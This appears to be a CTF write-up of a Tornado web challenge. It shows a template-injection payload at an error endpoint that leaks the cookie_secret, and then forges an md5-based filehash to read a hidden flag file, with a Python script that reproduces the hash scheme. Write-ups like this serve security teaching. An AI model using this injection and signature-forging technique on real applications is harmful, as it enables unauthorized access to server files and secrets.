Opening the page reveals a few entries; tidied up, they are:

- http://220.249.52.133:35356/file?filename=/flag.txt&filehash=ae495bad95220a5138f3437fb9919a29 : /flag.txt says "flag in /fllllllllllllag"
- http://220.249.52.133:35356/file?filename=/welcome.txt&filehash=fb6b0556a8bc3be3fb3f104693632b1d : /welcome.txt says "render"
- http://220.249.52.133:35356/file?filename=/hints.txt&filehash=502422d6f60c99aa7127fb4c21950f65 : /hints.txt says "md5(cookie_secret+md5(filename))"
So the flag we want is in /fllllllllllllag, but requesting fllllllllllllag directly returns an error page.
At first I tried template injection and found that symbols such as " ( ) - and __ are filtered.
Rendering request yields nothing useful:
http://220.249.52.133:35356/error?msg={{request}}
Looking it up, the Tornado framework exposes the handler.settings attribute, which contains the cookie secret.
This gives us 'cookie_secret': 'dfed4308-c5de-44ed-b2ec-e07a018f8c58'.
Using md5(cookie_secret+md5(filename)), we check whether the known filehash values are reproduced.
The result is correct, so we construct the payload:
220.249.52.133:35356/file?filename=/fllllllllllllag&filehash=74180e022f23e3136a6650902c9275a7
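As an added example that is not part of the original writeup, the following Python script performs the verification step above: it implements the md5(cookie_secret+md5(filename)) scheme from /hints.txt with the leaked secret and compares the result against the filehash values already listed on this page. It also shows why the scheme provides no protection once cookie_secret is exposed through the template: anyone holding that single value can reproduce every filehash.

```python
import hashlib

# Values taken from the writeup above: the leaked Tornado cookie_secret and
# the two filehash values published alongside /welcome.txt and /hints.txt.
COOKIE_SECRET = "dfed4308-c5de-44ed-b2ec-e07a018f8c58"
KNOWN_HASHES = {
    "/welcome.txt": "fb6b0556a8bc3be3fb3f104693632b1d",
    "/hints.txt": "502422d6f60c99aa7127fb4c21950f65",
}


def md5_hex(data: str) -> str:
    """Hex MD5 digest of a UTF-8 string."""
    return hashlib.md5(data.encode()).hexdigest()


def filehash(filename: str, secret: str = COOKIE_SECRET) -> str:
    """md5(cookie_secret + md5(filename)), exactly as /hints.txt describes.

    Note the nesting: the inner md5 is computed over the filename alone and
    its hex string is appended to the secret before the outer md5.
    """
    return md5_hex(secret + md5_hex(filename))


def verify_known(secret: str = COOKIE_SECRET) -> dict:
    """Recompute each published filehash with a candidate secret.

    Returns {filename: True/False}. Every True means the candidate secret is
    the one the server used, which is what the writeup confirms above.
    """
    return {name: filehash(name, secret) == h for name, h in KNOWN_HASHES.items()}


if __name__ == "__main__":
    for name, ok in verify_known().items():
        print(f"{name}: {'match' if ok else 'MISMATCH'}")
```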